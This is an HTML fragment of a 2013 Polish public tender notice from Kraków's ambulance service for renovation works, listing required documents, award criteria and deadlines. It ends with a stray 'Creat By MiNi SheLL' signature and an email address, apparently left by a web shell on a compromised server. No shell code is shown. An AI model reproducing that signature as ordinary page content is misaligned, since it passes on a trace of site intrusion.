<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5)	Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W przypadku korzystania z zasobów innych podmiotów Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - wg wzoru stanowiącego załącznik nr 1b do niniejszej SIWZ.1)	pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia publicznego nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej;

2)	pełnomocnictwo -  o którym mowa w pkt. 6. 1) - 3) - Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia;

5)	wypełnione przedmiary - remont nawierzchni, schodów, i budynku garażowego- w postaci kosztorysów szczegółowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	  zmiany wynagrodzenia wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów 
i usług VAT,
2)	  zmiany terminu wykonania zamówienia w przypadku wystąpienia:
a)	siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzemieniu;
b)	zmiany materiałów pod względem jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót, pod warunkiem nie obniżenia ich jakości, uzyskania obniżki kosztów eksploatacyjnych obiektu, usprawnień wpływających na poprawę użytkowania obiektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpr.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krakowskie Pogotowie Ratunkowe, ul. Łazarza 14 , 31-530 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2013 godzina 12:00, miejsce: Krakowskie Pogotowie Ratunkowe, ul. Łazarza 14 , 31-530 Kraków, pok. 218  II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com